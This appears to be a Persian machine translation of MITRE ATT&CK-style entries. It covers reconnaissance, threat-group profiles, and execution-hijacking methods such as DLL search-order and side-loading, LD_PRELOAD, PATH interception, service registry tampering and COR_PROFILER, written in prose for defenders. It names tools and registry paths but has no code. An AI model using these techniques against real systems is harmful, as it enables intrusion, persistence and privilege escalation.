دشمنان ممکن است اطلاعاتی در مورد وسایل امنیتی شبکه قربانی جمع آوری کنند که می‌تواند در طول هدف قرار دادن استفاده شود. اطلاعات مربوط به تجهیزات امنیتی شبکه ممکن است شامل جزئیات مختلفی باشد، مانند وجود و مشخصات دیوارهای آتش مستقر شده، فیلترهای محتوا، و پراکسی ها. دشمنان همچنین ممکن است اطلاعات مربوط به سیستم‌های تشخیص نفوذ مبتنی بر شبکه قربانی (NIDS) یا سایر ابزارهای مرتبط با عملیات دفاعی امنیت سایبری را هدف قرار دهند. دشمنان ممکن است این اطلاعات را به روش های مختلفی جمع آوری کنند، مانند اقدامات جمع آوری مستقیم از طریق اسکن فعال یا فیشینگ برای اطلاعات. اطلاعات مربوط به وسایل امنیتی شبکه نیز ممکن است از طریق آنلاین یا سایر مجموعه‌های داده قابل دسترس (مثلاً وب‌سایت‌های متعلق به قربانی جستجو) در معرض دشمنان قرار گیرد. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مثلاً جستجو در پایگاه‌های داده فنی باز یا جستجو در وب‌سایت‌ها/دامنه‌های باز)، ایجاد منابع عملیاتی (مثلاً: توسعه قابلیت‌ها یا دریافت قابلیت‌ها) و/یا دسترسی اولیه (مثلاً: خدمات از راه دور خارجی) را نشان دهد. ).

دشمنان ممکن است اطلاعاتی در مورد سازمان قربانی جمع‌آوری کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. اطلاعات مربوط به یک سازمان ممکن است شامل جزئیات مختلفی از جمله نام بخش/بخش‌ها، ویژگی‌های عملیات تجاری و همچنین نقش‌ها و مسئولیت‌های کارکنان اصلی باشد. دشمنان ممکن است این اطلاعات را به روش‌های مختلف، مانند استخراج مستقیم از طریق فیشینگ جمع‌آوری کنند. اطلاعات مربوط به یک سازمان نیز ممکن است از طریق داده‌های آنلاین یا دیگر مجموعه‌های قابل دسترسی (مانند: رسانه‌های اجتماعی یا جستجو در وب سایت‌های متعلق به قربانیان) در معرض مخالفان قرار گیرد. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مانند: فیشینگ برای اطلاعات یا جستجو در وب سایت‌ها/دامنه‌های باز) ، ایجاد منابع عملیاتی (به عنوان مثال: ایجاد حساب‌ها یا حساب‌های سازش) و/یا دسترسی اولیه (مانند فیشینگ یا رابطه مورد اعتماد) نشان دهد.

دشمنان ممکن است مکان(های) فیزیکی قربانی را جمع‌آوری کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. اطلاعات مربوط به مکان‌های فیزیکی یک سازمان هدف ممکن است شامل جزئیات مختلفی باشد، از جمله محل قرارگیری منابع کلیدی و زیرساخت‌ها. مکان‌های فیزیکی ممکن است نشان دهند که قربانی در چه صلاحیت قانونی و/یا مقاماتی فعالیت می‌کند. دشمنان ممکن است این اطلاعات را به روش‌های مختلف جمع‌آوری کنند، مانند استخراج مستقیم از طریق فیشینگ برای اطلاعات. مکان‌های فیزیکی یک سازمان هدف نیز ممکن است از طریق آنلاین یا سایر مجموعه‌های داده در دسترس (مثلاً: وب‌سایت‌های متعلق به جستجو قربانی یا رسانه‌های اجتماعی) در معرض دشمنان قرار گیرد. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مثلاً فیشینگ برای اطلاعات یا جستجو در وب‌سایت‌ها/دامنه‌های باز)، ایجاد منابع عملیاتی (مثلاً: توسعه قابلیت‌ها یا به دست آوردن قابلیت‌ها) و/یا دسترسی اولیه (مثلاً: فیشینگ یا افزودنی‌های سخت‌افزاری) را نشان دهد. ).

دشمنان ممکن است اطلاعاتی در مورد روابط تجاری قربانی جمع‌آوری کنند که می‌تواند در طول هدف قرار دادن استفاده شود. اطلاعات مربوط به روابط تجاری یک سازمان ممکن است شامل جزئیات مختلفی باشد، از جمله سازمان‌ها/دامنه‌های شخص ثالث(مثلاً: ارائه‌دهندگان خدمات مدیریت شده، پیمانکاران، و غیره) که دسترسی به شبکه متصل(و به طور بالقوه افزایش‌یافته) دارند. این اطلاعات همچنین ممکن است زنجیره های تامین و مسیرهای حمل و نقل برای منابع سخت افزاری و نرم افزاری قربانی را نشان دهد. دشمنان ممکن است این اطلاعات را به روش های مختلف جمع آوری کنند، مانند استخراج مستقیم از طریق فیشینگ برای اطلاعات. اطلاعات مربوط به روابط تجاری نیز ممکن است از طریق آنلاین یا سایر مجموعه‌های داده در دسترس (مثلاً: رسانه‌های اجتماعی یا وب‌سایت‌های متعلق به قربانی جستجو)در معرض دشمنان قرار گیرد. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مثلاً فیشینگ برای اطلاعات یا جستجو در وب‌سایت‌ها/دامنه‌های باز)، ایجاد منابع عملیاتی(مثلاً: ایجاد حساب‌ها یا حساب‌های در معرض خطر)، و/یا دسترسی اولیه (مثلاً: سازش در زنجیره تأمین، سازش درایو، یا رابطه مورد اعتماد).

دشمنان ممکن است اطلاعاتی در مورد سرعت تجاری قربانی جمع‌آوری کنند که می‌تواند در طول هدف قرار دادن استفاده شود. اطلاعات مربوط به سرعت کسب‌وکار یک سازمان ممکن است شامل جزئیات مختلفی از جمله ساعات/روزهای عملیاتی هفته باشد. این اطلاعات همچنین ممکن است زمان/تاریخ خرید و ارسال منابع سخت‌افزاری و نرم‌افزاری قربانی را نشان دهد. دشمنان ممکن است این اطلاعات را به روش‌های مختلف جمع‌آوری کنند، مانند استخراج مستقیم از طریق فیشینگ برای اطلاعات. اطلاعات مربوط به سرعت کسب‌وکار ممکن است از طریق آنلاین یا سایر مجموعه‌های داده در دسترس (مثلاً: رسانه‌های اجتماعی یا وب‌سایت‌های متعلق به قربانیان جستجو) در معرض دشمنان قرار گیرد. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مثلاً فیشینگ برای اطلاعات یا جستجو در وب‌سایت‌ها/دامنه‌های باز)، ایجاد منابع عملیاتی (مثلاً ایجاد حساب‌ها یا حساب‌های در معرض خطر)، و/یا دسترسی اولیه (مثلاً: سازش در زنجیره تأمین یا رابطه قابل اعتماد)

دشمنان ممکن است اطلاعاتی در مورد هویت‌ها و نقش‌ها در سازمان قربانی جمع‌آوری کنند که می‌تواند در طول هدف قرار دادن استفاده شود. اطلاعات مربوط به نقش‌های تجاری ممکن است انواع مختلفی از جزئیات قابل هدف را نشان دهد، از جمله اطلاعات قابل شناسایی برای پرسنل کلیدی و همچنین به چه داده ها/منابعی که آنها به آنها دسترسی دارند. دشمنان ممکن است این اطلاعات را به روش‌های مختلف جمع‌آوری کنند، مانند استخراج مستقیم از طریق فیشینگ برای اطلاعات. اطلاعات مربوط به نقش‌های تجاری نیز ممکن است از طریق آنلاین یا سایر مجموعه‌های داده در دسترس (مثلاً: رسانه‌های اجتماعی یا وب‌سایت‌های متعلق به قربانی جستجو) در معرض دشمنان قرار گیرد. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مثلاً فیشینگ برای اطلاعات یا جستجو در وب‌سایت‌ها/دامنه‌های باز)، ایجاد منابع عملیاتی (مثلاً: ایجاد حساب‌ها یا حساب‌های در معرض خطر)، و/یا دسترسی اولیه (مثلاً: فیشینگ) را نشان دهد.

دشمنان ممکن است اطلاعاتی را در مورد تنظیمات Group Policy جمع‌آوری کنند تا مسیرهای افزایش امتیاز، اقدامات امنیتی اعمال شده در یک دامنه، و کشف الگوهایی در اشیاء دامنه را که می‌توان آنها را دستکاری کرد یا برای ترکیب در محیط استفاده کرد، جمع‌آوری کرد. Group Policy امکان مدیریت متمرکز تنظیمات کاربر و کامپیوتر در Active Directory (AD) را فراهم می کند. اشیاء خط مشی گروه(GPO) محفظه هایی برای تنظیمات خط مشی گروه هستند که از فایل‌های ذخیره شده در یک مسیر شبکه قابل پیش بینی \\SYSVOL\\Policies\تشکیل شده است. دشمنان ممکن است از دستوراتی مانند gpresult یا توابع مختلف PowerShell در دسترس عموم، مانند Get-DomainGPO و Get-DomainGPOLocalGroup برای جمع آوری اطلاعات در مورد تنظیمات خط مشی گروه استفاده کنند. دشمنان ممکن است از این اطلاعات برای شکل دادن به رفتارهای بعدی، از جمله تعیین مسیرهای حمله احتمالی در شبکه هدف و همچنین فرصت‌هایی برای دستکاری تنظیمات خط‌مشی گروه (یعنی اصلاح سیاست دامنه) به نفع خود استفاده کنند.

GALLIUM گروهی است که حداقل از سال 2012 فعال بوده و عمدتاً شبکه های مخابراتی با مشخصات بالا را هدف قرار داده است. GALLIUM در برخی گزارش‌ها به‌عنوان یک گروه تحت حمایت دولت چین شناسایی شده است که تا حدی بر اساس ابزارهای مورد استفاده و TTP‌هایی است که معمولاً با عوامل تهدید چینی مرتبط هستند.

Gallmaker یک گروه جاسوسی سایبری است که قربانیان را در خاورمیانه هدف قرار داده است و حداقل از دسامبر 2017 فعال بوده است. این گروه عمدتاً قربانیان را در بخش‌های دفاعی، نظامی و دولتی هدف قرار داده است.

گروه گاماردون یک گروه تهدید است که حداقل از سال 2013 فعال بوده و افرادی که احتمالاً در دولت اوکراین دخیل هستند را هدف قرار داده است. نام گروه گاماردون از غلط املایی کلمه "آرماگدون" گرفته شده است که در مبارزات اولیه دشمن شناسایی شد.

GCMAN یک گروه تهدید است که بر هدف قرار دادن بانک ها به منظور انتقال پول به خدمات ارز الکترونیکی تمرکز دارد.

GOLD SOUTHFIELD یک گروه تهدید با انگیزه مالی است که حداقل از سال 2019 فعال است و سرویس Ransomware-as-a (RaaS) REvil را اجرا می کند. GOLD SOUTHFIELD زیرساخت‌های پشتیبان را برای شرکت‌های وابسته که در انجمن‌های زیرزمینی استخدام می‌شوند برای اجرای استقرار با ارزش بالا فراهم می‌کند.

گروه گورگون یک گروه تهدید متشکل از اعضایی است که گمان می رود ساکن پاکستان باشند یا با پاکستان ارتباط دیگری دارند. این گروه ترکیبی از حملات جنایتکارانه و هدفمند، از جمله کمپین هایی علیه سازمان های دولتی در بریتانیا، اسپانیا، روسیه و ایالات متحده انجام داده است.

Group5یک گروه تهدید با پیوند مشکوک ایرانی است، اگرچه این انتساب قطعی نیست. این گروه افراد مرتبط با اپوزیسیون سوریه را از طریق نیزه‌شکن و سوراخ‌های آبیاری که معمولاً از موضوعات سوری و ایرانی استفاده می‌کنند، هدف قرار داده است. Group5از دو ابزار دسترسی از راه دور ( RAT) که معمولاً در دسترس هستند، njRAT و NanoCore، و همچنین یک Android RAT، DroidJack استفاده کرده است.

تقسیم پاسخ HTTP زمانی اتفاق می‌افتد که داده‌ها از طریق یک منبع غیرقابل اعتماد، اغلب درخواست HTTP ، وارد برنامه وب می‌شوند. داده‌ها در یک سرصفحه HTTP پاسخ و ارسال می‌شوند که برای کاربر وب ارسال می‌شود بدون اینکه برای کاراکترهای مخرب تأیید شود.

دشمنان ممکن است لوازم جانبی رایانه‌ها یا سخت‌افزار شبکه را به یک سیستم یا شبکه وارد کنند که می‌تواند به‌عنوان بردار برای دستیابی به دسترسی استفاده شود. در حالی که ارجاعات عمومی استفاده توسط عوامل تهدید کمیاب است، بسیاری از تیم‌های قرمز/ تست‌کنندگان نفوذ از افزودنی‌های سخت‌افزاری برای دسترسی اولیه استفاده می‌کنند. محصولات تجاری و منبع باز را می توان با قابلیت هایی مانند ضربه زدن به شبکه غیرفعال، اصلاح ترافیک شبکه، تزریق ضربه کلید، خواندن حافظه هسته از طریق DMA مورد استفاده قرار داد.

دشمنان ممکن است بارهای مخرب خود را با ربودن شیوه اجرای برنامه ها توسط سیستم عامل ها اجرا کنند. جریان اجرای ربوده شده می تواند به منظور تداوم باشد، زیرا این اجرای ربوده شده ممکن است در طول زمان دوباره تکرار شود. دشمنان همچنین ممکن است از این مکانیسم‌ها برای بالا بردن امتیازات یا فرار از دفاع‌ها مانند کنترل برنامه یا سایر محدودیت‌های اجرا استفاده کنند. راه‌های زیادی وجود دارد که دشمن می‌تواند جریان اجرا را هک کند، از جمله با دستکاری نحوه مکان‌یابی سیستم عامل برنامه‌هایی که باید اجرا شوند. نحوه مکان یابی سیستم عامل کتابخانه ها برای استفاده توسط یک برنامه نیز قابل رهگیری است. مکان‌هایی که سیستم‌عامل به دنبال برنامه‌ها/منابع می‌گردد، مانند دایرکتوری‌های فایل و در مورد ویندوز رجیستری، می‌توانند حاوی بارهای مخرب باشند.

دشمنان ممکن است بارهای مخرب خود را با ربودن دستور جستجوی مورد استفاده برای بارگیری DLL اجرا کنند. سیستم های ویندوز از یک روش معمول برای جستجوی DLL های مورد نیاز برای بارگذاری در یک برنامه استفاده می کنند. ربودن بارهای DLL ممکن است به منظور ایجاد پایداری و همچنین افزایش امتیازات و/یا فرار از محدودیت در اجرای فایل باشد. راه های زیادی وجود دارد که دشمن می تواند بارهای DLL را ربوده باشد. دشمنان ممکن است فایل‌های کتابخانه پیوند پویا تروجان ( DLL) را در دایرکتوری قرار دهند که قبل از مکان یک کتابخانه قانونی که توسط یک برنامه درخواست می‌شود جستجو می‌شود و باعث می‌شود ویندوز کتابخانه مخرب خود را در زمانی که برنامه قربانی فراخوانی می‌کند، بارگیری کند. دشمنان همچنین ممکن است بارگذاری اولیه DLL را انجام دهند که به آن حملات کاشت باینری نیز می گویند، با قرار دادن یک DLL مخرب با همان نام DLL مشخص شده مبهم در مکانی که ویندوز قبل از DLL قانونی جستجو می کند. اغلب این مکان دایرکتوری فعلی برنامه است. حملات پیش بارگذاری DLL از راه دور زمانی رخ می دهد که یک برنامه فهرست راهنمای فعلی خود را قبل از بارگیری یک DLL روی یک مکان راه دور مانند اشتراک وب تنظیم می کند. دشمنان همچنین ممکن است مستقیماً ترتیب جستجو را از طریق تغییر مسیر DLL تغییر دهند، که پس از فعال شدن (در رجیستری و ایجاد یک فایل تغییر مسیر) ممکن است باعث شود یک برنامه یک DLL دیگر را بارگیری کند. اگر یک برنامه آسیب پذیر به ترتیب جستجو پیکربندی شده باشد تا در سطح امتیاز بالاتر اجرا شود، DLL کنترل شده توسط دشمن که بارگذاری می شود نیز در سطح بالاتر اجرا می شود. در این مورد، بسته به برنامه می‌توان از این تکنیک برای افزایش امتیاز از کاربر به مدیر یا SYSTEM یا از مدیر به SYSTEM استفاده کرد. برنامه هایی که قربانی هک کردن مسیر می شوند ممکن است به نظر عادی عمل کنند زیرا DLL های مخرب ممکن است به گونه ای پیکربندی شوند که DLL های قانونی را که قرار بود جایگزین کنند نیز بارگیری کنند.

دشمنان ممکن است بارهای مخرب خود را با بارگذاری جانبی DLL اجرا کنند. مشابه با DLL Search Order Hijacking، بارگذاری جانبی شامل ربودن DLL است که یک برنامه بارگیری می کند. اما به جای کاشت DLL در ترتیب جستجوی یک برنامه و سپس انتظار برای فراخوانی برنامه قربانی، دشمنان ممکن است مستقیماً محموله های خود را با کاشت و سپس فراخوانی یک برنامه قانونی که بار (بار) آنها را اجرا می کند، بارگذاری کنند. Side-loading از ترتیب جستجوی DLL استفاده شده توسط لودر با قرار دادن برنامه قربانی و بار(های) مخرب در کنار یکدیگر استفاده می کند. دشمنان احتمالاً از بارگذاری جانبی به عنوان وسیله ای برای پنهان کردن اقداماتی که تحت یک فرآیند سیستم یا نرم افزار قانونی، قابل اعتماد و بالقوه بالا انجام می دهند استفاده می کنند. فایل های اجرایی خوش خیم مورد استفاده برای بارگذاری جانبی محموله ها ممکن است در هنگام تحویل و/یا اجرا علامت گذاری نشوند. محموله‌های دشمن نیز ممکن است رمزگذاری/بسته‌بندی شوند یا تا زمانی که در حافظه فرآیند مورد اعتماد بارگیری شوند، مبهم شوند.

دشمنان ممکن است با قرار دادن یک کتابخانه پویا مخرب ( dylib) با نام مورد انتظار در مسیری که برنامه قربانی در زمان اجرا جستجو می کند، بارهای خود را اجرا کنند. لودر پویا سعی می کند dylib ها را بر اساس ترتیب ترتیبی مسیرهای جستجو پیدا کند. پیشوند مسیرهای dylibs ممکن است با @rpath باشد، که به توسعه دهندگان اجازه می دهد تا از مسیرهای نسبی برای تعیین آرایه ای از مسیرهای جستجوی مورد استفاده در زمان اجرا بر اساس مکان فایل اجرایی استفاده کنند. علاوه بر این، اگر از پیوند ضعیف استفاده شود، مانند تابع LC_LOAD_WEAK_DYLIB ، یک برنامه همچنان اجرا خواهد شد حتی اگر یک dylib مورد انتظار وجود نداشته باشد. پیوند ضعیف به توسعه دهندگان این امکان را می دهد تا با اضافه شدن API های جدید، یک برنامه را روی چندین نسخه macOS اجرا کنند. دشمنان ممکن است با وارد کردن dylib های مخرب با نام dylib گم شده در مسیر شناسایی شده، اعدام شوند. Dylib ها در فضای آدرس برنامه بارگذاری می شوند و به dylib مخرب اجازه می دهند تا سطح امتیاز و منابع برنامه را به ارث ببرند. بر اساس برنامه، این می‌تواند منجر به افزایش امتیاز و دسترسی بدون ممانعت به شبکه شود. این روش همچنین ممکن است از شناسایی محصولات امنیتی اجتناب کند زیرا اجرا تحت یک فرآیند قانونی پوشانده شده است.

دشمنان ممکن است بارهای مخرب خود را با ربودن باینری های مورد استفاده توسط یک نصب کننده اجرا کنند. این فرآیندها ممکن است به طور خودکار باینری های خاصی را به عنوان بخشی از عملکرد خود یا برای انجام اقدامات دیگر اجرا کنند. اگر مجوزهای موجود در فهرست فایل سیستم حاوی یک باینری هدف، یا مجوزهای خود باینری، به درستی تنظیم نشده باشند، آنگاه باینری هدف ممکن است با استفاده از مجوزهای سطح کاربر با باینری دیگری بازنویسی شود و توسط فرآیند اصلی اجرا شود. اگر فرآیند و رشته اصلی تحت یک سطح مجوز بالاتر اجرا شوند، باینری جایگزین شده نیز تحت مجوزهای سطح بالاتر اجرا می شود که می تواند شامل SYSTEM باشد. یکی دیگر از انواع این تکنیک را می توان با بهره گیری از ضعفی که در نصاب های اجرایی و خود استخراج شونده رایج است، انجام داد. در طول فرآیند نصب، معمولاً نصاب‌ها از یک زیرشاخه در فهرست %TEMP% برای باز کردن بسته‌بندی باینری‌ها مانند DLL، EXE یا سایر محموله‌ها استفاده می‌کنند. هنگامی که نصب‌کننده‌ها زیر شاخه‌ها و فایل‌ها را ایجاد می‌کنند، اغلب مجوزهای مناسبی را برای محدود کردن دسترسی نوشتن تنظیم نمی‌کنند، که امکان اجرای کدهای نامعتبر قرار گرفته در زیر شاخه‌ها یا بازنویسی باینری‌های مورد استفاده در فرآیند نصب را فراهم می‌کند. این رفتار مربوط به ربودن سفارش جستجوی DLL است و ممکن است از آن استفاده کند. دشمنان ممکن است از این تکنیک برای جایگزینی باینری های قانونی با موارد مخرب به عنوان ابزاری برای اجرای کد در سطح مجوزهای بالاتر استفاده کنند. برخی از نصب‌کننده‌ها ممکن است به امتیازات بالاتری نیز نیاز داشته باشند که منجر به افزایش امتیاز هنگام اجرای کد کنترل‌شده توسط دشمن شود. این رفتار مربوط به Bypass User Account Control است. چندین نمونه از این ضعف در نصب کننده های رایج موجود به فروشندگان نرم افزار گزارش شده است. اگر فرآیند اجرا در یک زمان خاص یا در طول یک رویداد خاص (به عنوان مثال، راه‌اندازی سیستم) تنظیم شده باشد، می‌توان از این تکنیک برای ماندگاری نیز استفاده کرد.

دشمنان ممکن است بارهای مخرب خود را با ربودن متغیرهای محیطی که پیوندگر پویا برای بارگیری کتابخانه های مشترک استفاده می کند، اجرا کنند. در طول مرحله آماده سازی اجرای یک برنامه، پیوند دهنده پویا مسیرهای مطلق کتابخانه های مشترک را از متغیرها و فایل های محیطی، مانند LD_PRELOAD در لینوکس یا DYLD_INSERT_LIBRARIES در macOS، مشخص می کند. کتابخانه‌های مشخص‌شده در متغیرهای محیطی ابتدا بارگذاری می‌شوند و بر کتابخانه‌های سیستمی با نام تابع یکسان اولویت دارند. این متغیرها اغلب توسط توسعه دهندگان برای اشکال زدایی باینری ها بدون نیاز به کامپایل مجدد، رفع تعارض نمادهای نگاشت شده، و اجرای توابع سفارشی بدون تغییر کتابخانه اصلی استفاده می شوند. در لینوکس و macOS، ربودن متغیرهای پیوند دهنده پویا ممکن است به حافظه، منابع سیستم شبکه قربانی، و احتمالاً امتیازات بالاتری دسترسی داشته باشد. این روش همچنین ممکن است از شناسایی محصولات امنیتی اجتناب کند زیرا اجرا تحت یک فرآیند قانونی پوشانده شده است. دشمنان می توانند متغیرهای محیطی را از طریق خط فرمان با استفاده از دستور صادرات، تابع setenv یا تابع putenv تنظیم کنند. دشمنان همچنین می توانند از Dynamic Linker Hijacking برای صادرات متغیرها در یک پوسته استفاده کنند یا متغیرها را به صورت برنامه نویسی با استفاده از نحو سطح بالاتر مانند os.environ پایتون تنظیم کنند. در لینوکس، دشمنان ممکن است LD_PRELOAD را طوری تنظیم کنند که به کتابخانه های مخربی اشاره کند که با نام کتابخانه های قانونی درخواست شده توسط یک برنامه قربانی مطابقت دارد و باعث می شود که سیستم عامل پس از اجرای برنامه قربانی، کد مخرب دشمن را بارگیری کند. LD_PRELOAD را می توان از طریق متغیر محیطی یا فایل /etc/ld.so.preload تنظیم کرد. کتابخانه های مشخص شده توسط LD_PRELOAD به ترتیب توسطdlopen() و mmap() بارگیری و در حافظه نگاشت می شوند. در macOS این رفتار از نظر مفهومی مانند لینوکس است و فقط در نحوه پیاده‌سازی کتابخانه‌های پویا macOS (dyld) در سطح پایین‌تر متفاوت است. دشمنان می‌توانند متغیر محیطی DYLD_INSERT_LIBRARIES را طوری تنظیم کنند که به کتابخانه‌های مخرب حاوی نام کتابخانه‌های قانونی یا توابع درخواست شده توسط یک برنامه قربانی اشاره کند.

دشمنان ممکن است بارهای مخرب خود را با ربودن متغیرهای محیطی مورد استفاده برای بارگذاری کتابخانه ها اجرا کنند. دشمنان ممکن است برنامه‌ای را در ورودی قبلی در فهرست دایرکتوری‌های ذخیره شده در متغیر محیطی PATH قرار دهند، که ویندوز پس از جستجوی متوالی در فهرست PATH در جستجوی باینری که از یک اسکریپت یا خط فرمان فراخوانی شده است، آن را اجرا می‌کند. متغیر محیطی PATH شامل فهرستی از دایرکتوری ها است. روش‌های خاصی برای اجرای یک برنامه (یعنی استفاده از cmd.exe یا خط فرمان) تنها به متغیر محیطی PATH برای تعیین مکان‌هایی که برای یک برنامه جستجو می‌شوند، زمانی که مسیر برنامه داده نشده است، متکی هستند. اگر هر دایرکتوری در متغیر محیطی PATH قبل از دایرکتوری ویندوز، %SystemRoot%\system32 (به عنوان مثال، C:\Windows\system32 ) فهرست شده باشد، ممکن است برنامه ای در فهرست قبلی قرار داده شود که نام آن همان برنامه ویندوز است. مانند cmd، PowerShell یا Python)، که زمانی که آن دستور از یک اسکریپت یا خط فرمان اجرا می شود، اجرا می شود. به عنوان مثال، اگر مسیر C:\example path قبل از C:\Windows\system32 در متغیر محیطی PATH باشد، برنامه‌ای که net.exe نام دارد و در مسیر C:\example قرار می‌گیرد به جای سیستم ویندوز "net" فراخوانی می‌شود. هنگامی که"net" از خط فرمان اجرا می شود.

دشمنان ممکن است بارهای مخرب خود را با ربودن دستور جستجوی مورد استفاده برای بارگذاری سایر برنامه ها اجرا کنند. از آنجایی که برخی از برنامه‌ها با استفاده از مسیر کامل، برنامه‌های دیگر را فراخوانی نمی‌کنند، ممکن است دشمنان فایل خود را در فهرستی که برنامه فراخوانی در آن قرار دارد، قرار دهند و باعث می‌شود که سیستم‌عامل نرم‌افزار مخرب خود را به درخواست برنامه فراخوان راه‌اندازی کند. ربودن دستور جستجو زمانی اتفاق می‌افتد که یک دشمن از ترتیب جستجوی برنامه‌هایی که مسیری برای آن‌ها در نظر گرفته نشده توسط ویندوز استفاده می‌کند. برخلاف DLL Search Order Hijacking، ترتیب جستجو بسته به روشی که برای اجرای برنامه استفاده می شود متفاوت است. با این حال، معمول است که ویندوز قبل از جستجو در دایرکتوری سیستم ویندوز، در دایرکتوری برنامه شروع کننده جستجو کند. حریفی که برنامه‌ای را در برابر ربودن دستور جستجو آسیب‌پذیر می‌بیند (یعنی برنامه‌ای که مسیر یک فایل اجرایی را مشخص نمی‌کند) ممکن است از این آسیب‌پذیری با ایجاد برنامه‌ای به نام برنامه نامناسب و قرار دادن آن در فهرست برنامه شروع‌کننده استفاده کند.

دشمنان ممکن است بارهای مخرب خود را با ربودن مراجع مسیر فایل آسیب پذیر اجرا کنند. دشمنان می توانند با قرار دادن یک فایل اجرایی در یک فهرست سطح بالاتر در مسیر، از مسیرهایی که فاقد نقل قول های اطراف هستند استفاده کنند، به طوری که ویندوز فایل اجرایی دشمن را برای راه اندازی انتخاب کند. مسیرهای سرویس و مسیرهای میانبر نیز ممکن است در برابر رهگیری مسیر آسیب‌پذیر باشند اگر مسیر دارای یک یا چند فاصله باشد و اطراف آن با علامت نقل قول احاطه نشده باشد مثلاً C:\unsafe path with or space\program.exe vs. "C:\safe path with space\program.exe"

دشمنان ممکن است بارهای مخرب خود را با ربودن باینری های استفاده شده توسط سرویس ها اجرا کنند. دشمنان ممکن است از نقص‌هایی در مجوزهای سرویس‌های ویندوز برای جایگزینی باینری استفاده کنند که هنگام شروع سرویس اجرا می‌شود. این فرآیندهای سرویس ممکن است به طور خودکار باینری های خاصی را به عنوان بخشی از عملکرد خود یا برای انجام اقدامات دیگر اجرا کنند. اگر مجوزهای دایرکتوری سیستم فایل حاوی یک باینری هدف، یا مجوزهای خود باینری به درستی تنظیم نشده باشند، ممکن است باینری هدف با استفاده از مجوزهای سطح کاربر با باینری دیگری بازنویسی شود و توسط فرآیند اصلی اجرا شود. اگر فرآیند و رشته اصلی تحت یک سطح مجوز بالاتر اجرا شوند، باینری جایگزین شده نیز تحت مجوزهای سطح بالاتر اجرا می شود که می تواند شامل SYSTEM باشد. دشمنان ممکن است از این تکنیک برای جایگزینی باینری های قانونی با موارد مخرب به عنوان ابزاری برای اجرای کد در سطح مجوزهای بالاتر استفاده کنند. اگر فرآیند اجرا در یک زمان خاص یا در طول یک رویداد خاص (مثلاً راه‌اندازی سیستم) تنظیم شده باشد، می‌توان از این تکنیک برای ماندگاری نیز استفاده کرد.

دشمنان ممکن است بارهای مخرب خود را با ربودن ورودی های رجیستری مورد استفاده توسط سرویس ها اجرا کنند. دشمنان ممکن است از نقایصی در مجوزهای کلیدهای رجیستری مربوط به سرویس‌ها استفاده کنند تا از فایل اجرایی مشخص‌شده اولیه به فایلی که کنترل می‌کنند هدایت شوند تا کد خود را هنگام شروع سرویس راه‌اندازی کنند. ویندوز اطلاعات پیکربندی سرویس محلی را در رجیستری تحت HKLM\SYSTEM\CurrentControlSet\Services ذخیره می کند. اطلاعات ذخیره شده در زیر کلیدهای رجیستری سرویس را می توان برای تغییر پارامترهای اجرای سرویس از طریق ابزارهایی مانند کنترلر سرویس، sc.exe، PowerShell یا Reg دستکاری کرد. دسترسی به کلیدهای رجیستری از طریق لیست های کنترل دسترسی و مجوزهای کاربر کنترل می شود. اگر مجوزهای کاربران و گروه ها به درستی تنظیم نشده باشد و اجازه دسترسی به کلیدهای رجیستری برای یک سرویس را بدهد، دشمنان ممکن است binPath/ImagePath سرویس را تغییر دهند تا به یک فایل اجرایی دیگر تحت کنترل خود اشاره کنند. هنگامی که سرویس شروع می شود یا مجدداً راه اندازی می شود، برنامه کنترل شده توسط دشمن اجرا می شود و به دشمن اجازه می دهد تداوم و/یا افزایش امتیاز را در زمینه حسابی که سرویس قرار است تحت آن اجرا کند (حساب محلی/دامنه، SYSTEM، LocalService یا خدمات شبکه). دشمنان همچنین ممکن است سایر کلیدهای رجیستری را در درخت رجیستری سرویس تغییر دهند. برای مثال، کلید FailureCommand ممکن است طوری تغییر کند که هر زمان که سرویس از کار بیفتد یا عمداً خراب شود، سرویس در یک زمینه بالا اجرا شود. کلید عملکرد شامل نام DLL عملکرد یک سرویس راننده و نام چندین توابع صادر شده در DLL است. اگر کلید عملکرد از قبل وجود نداشته باشد و اگر کاربر تحت کنترل دشمن مجوز Create Subkey را داشته باشد، دشمنان ممکن است کلید عملکرد را در درخت رجیستری سرویس ایجاد کنند تا به یک DLL مخرب اشاره کند. دشمنان همچنین ممکن است کلید Parameters را اضافه کنند، که داده‌های خاص درایور یا کلیدهای فرعی سفارشی دیگر را برای سرویس‌های مخرب خود ذخیره می‌کند تا تداوم داشته باشند یا سایر فعالیت‌های مخرب را فعال کنند. علاوه بر این، اگر دشمنان سرویس‌های مخرب خود را با استفاده از svchost.exe راه‌اندازی کنند، ممکن است فایل سرویس با استفاده از HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll شناسایی شود.

دشمنان ممکن است از متغیر محیطی COR_PROFILER برای ربودن جریان اجرای برنامه‌هایی که .NET CLR. را بارگیری می‌کنند، استفاده کنند. COR_PROFILER یک ویژگی چارچوب دات نت است که به توسعه دهندگان اجازه می دهد تا یک DLL پروفایل مدیریت نشده (یا خارجی از دات نت) را برای بارگذاری در هر فرآیند دات نت که زمان اجرای زبان مشترک (CLR) را بارگیری می کند، مشخص کنند. این پروفایل‌کننده‌ها برای نظارت، عیب‌یابی و اشکال‌زدایی کدهای مدیریت‌شده اجرا شده توسط NET CLR طراحی شده‌اند. متغیر محیطی COR_PROFILER را می توان در دامنه های مختلف (سیستم، کاربر یا فرآیند) تنظیم کرد که منجر به سطوح مختلف نفوذ می شود. دامنه متغیر سیستم و محیط کاربر در رجیستری مشخص شده است، جایی که یک شیء مدل شیء جزء (COM)می‌تواند به عنوان یک DLL پروفایل ثبت شود. یک محدوده فرآیند COR_PROFILER نیز می تواند در حافظه بدون تغییر رجیستری ایجاد شود.

